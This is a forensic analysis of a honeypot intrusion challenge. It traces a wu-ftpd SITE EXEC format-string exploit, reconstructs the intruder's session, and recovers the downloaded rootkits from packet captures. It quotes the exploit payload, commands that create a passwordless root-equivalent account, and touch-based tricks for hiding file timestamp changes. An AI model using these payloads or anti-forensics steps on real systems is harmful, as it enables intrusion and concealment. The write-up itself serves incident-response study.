Scan 19 Analysis

Analysis of October's Scan of the Month (Scan 19)

By Jason Testart <jtestart@ryerson.ca>

Answers to the questions

1.Which vulnerability did the intruder exploit?

The intruder exploited a SITE EXEC vulnerability in wu-ftpd.
See http://www.redhat.com/support/errata/RHSA-2000-039-02.html

2.What ways, and in what order, did the intruder use to connect and run commands on the system?

The intruder first ran commands from the root shell that was obtained from the FTP exploit. Next, the intruder logged in to the nobody account via telnet then did an su to the newly created root-equivalent dns account. The third connection was made using an SSH backdoor on port 24. See the Analysis section below for more detail. It should be noted also that the intruder first attempted to connect to via telnet and presumably via SSH on ports 24 and 6666.

3.How did the intruder try to hide his edits from the MAC times?

For a given file, the intruder first creates two dummy directories, one for the file to be edited and one for the directory containing that file. The intruder then uses the touch command to give the dummy directories modify, access, and create times of the file (and corresponding directory) that will be edited. After the intruder edits the file, the intruder then touches the edited file (and corresponding directory) with the MAC times of the respective dummy directories. See the Analysis section to see what the intruder actually did.

4.The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

The intruder downloaded three files:

Zer0.tar.gz
copy.tar.gz
ooty.tar.gz

Here's a quick analysis of the files:

Zer0

copy
This is simply a collection of exploit scripts for remotely exploiting wu-ftp. There is also a copy of smurf.

ooty
This appears to be a collection of "local" exploit scripts. These are used to get root if the attacker already has an account on the system.

5.Recover (tell how you did it too) the rootkits from the snort binary capture

To simplify things, I first ran the command:

% tcpdump -r newdata3.log -w downloads.log host 193.231.236.42

to get a binary capture of just the communication between the compromised machine and the Romanian ftp site.
I then ran Ethereal and loaded the new file downloads.log. I saw that packet #26 was an FTP request for the file Zer0.tar.gz, so with the next packet involving the FTPDATA port (packet #32) I used the the nifty "Follow TCP Stream" feature and got a new window of data. Ethereal then gives you the option to save the captured session, so I did with the name Zer0.tar.gz. I then ran the command:

% file Zer0.tar.gz
Zer0.tar.gz: gzip compressed data - deflate method , max compression

Voila, it worked! I repeated the process for the remaining files.

6.What does the rootkit do to hide the presence of the attacker on the system?

As described previously, the rootkit installs a kernel module that hides processes, open files (including sockets) and files/directories on the filesystem.

7.What did you learn from this exercise?

I learned alot from the exercise. First of all, I got more comfortable with tcpdump, Ethereal and packet analysis in general. I learned that the touch command takes command-line options. I also learned that intuders are getting better at hiding themselves and have well equiped rootkits.

8.How long did this challenge take you?

I would say in total, this challenge took me about 6 hours, this is not including building and getting familiar with tcpdump and Ethereal. Producing this report took a lot of time.

Analysis of the snort binary captures

Having little previous experience with with snort I was unsure for a brief moment of what to do with the binary capture files provided. My first instinct was to run "strings" on the files. This gave me some hints on what I was dealing with, but I needed to do this properly. After a few minutes of reading previous "scan of the month" entries, I realized that I needed to download, build, and install Tcpdump and Ethereal on my Solaris workstation. Ethereal is essential for this excercise since one can easily "Follow a TCP stream" to see entire login sessions, etc...

Doing the "strings" on newdat3.log gave evidence of an ftp buffer overflow. So, using Ethereal, I scrolled through each packet of the capture looking for what could be an ftp attack. Sure enough, at 19:55 on September 16th, we see an anonymous ftp login from IP address 207.35.251.172. Using the "Follow TCP stream" feature of Ethereal, I was able to capture the entire session. Below is the beginning of the attack.

USER ftp
PASS mozilla@
SITE EXEC %020d|%.f%.f|
SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|

The attack progresses for a bit until we see the attacker getting a root shell. At this point, the attacker begins to confirm he/she is indeed root and looks for a place in the filesystem to take the next step of the intrusion. The attacker (who we can now call an intruder) then enters the following commands:

passwd nobody -d 
cd /
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc
ls
ls -d
ls -s
ls -a
ls -n
ls -lt
cd etc
ls -lt
cat passwd

Above, we see the intruder delete the password for the user nobody, and create a superuser account named dns with no password. Before creating the new account, the intruder makes dummy directories to store the MAC times of /etc and /etc/passwd (using the touch command) so that they can be restored after the change to /etc/passwd is made. This is a cool trick, something I didn't even realize you could do until I read the man page for the touch command! The intruder then confirms the MAC times of /etc and /etc/passwd were maintained (perhaps having some trouble with the ls command in the processes) and that the account addtion was successful.

Next, at 20:32, we see a telnet connection from from 217.156.93.166 with login nobody. The intruder immediately does an su to the newly created root-equivalent dns account and creates the directory /dev/rd/sdc0. After a cd to the newly created directory, the intuder makes an ftp connection to "teleport.go.ro" (193.231.236.42). >From the Romanian site, the intruder downloads three files:

Zer0.tar.gz
copy.tar.gz
ooty.tar.gz

When the downloads completed, the intruder then expanded the archive Zer0.tar.gz , and ran the command "./Go 24" from within the Zer0 subdirectory. I believe that because of the strange characters in the "Go" script (from colorization of shell output???), Ethereal failed to output the remainder of the session. This isn't a big deal though, because I recovered the rootkits from the snort binary and examined how they work.

At 20:51, a connection again from 217.156.93.166 but this time on port 24. Once again, using the nifty feature of Ethereal to follow the TCP stream we discover that the session is encrypted. The first line of the session says it all:

SSH-1.5-1.2.27

However, hope is not lost! We still have the syslog output from the slog2.log file provided. Examining this file we see that all the shell history entries correspond to what we saw in the other snort binary capture. Even the PAM authentication logging matches. We can easily deduce from the time, and the fact that a UID=0 shell suddenly starts up, that the shell with PID=9382 was spawned from the SSH backdoor (not PAM enabled). The shell history follows:

cd /dev/rd/sdc0
ls
rm Zer0.tar.gz
ls
alias ls='ls --color'
ls
ls
passwd nobody
ping www.yahoo.com
pico /etc/rc.d/rc3.d/S50inet
ls
mv copy.tar.gz /usr/X11R6/bin/.,/copy/
cd /usr/X11R6/bin/.,/copy/
mv copy.tar.gz ../
ls
cd ..
tar zxvf copy.tar.gz
chmod 7777 *
ls
rm copy.tar.gz
cd copy
chmod 7777 *
ls
uname -r
pstree

>From the shell history above, it's difficult to know what the intruder was really doing apart from expanding the file copy.tar.gz. I would be interested in knowing what edits were made to /etc/rc.d/rc3.d/S50inet.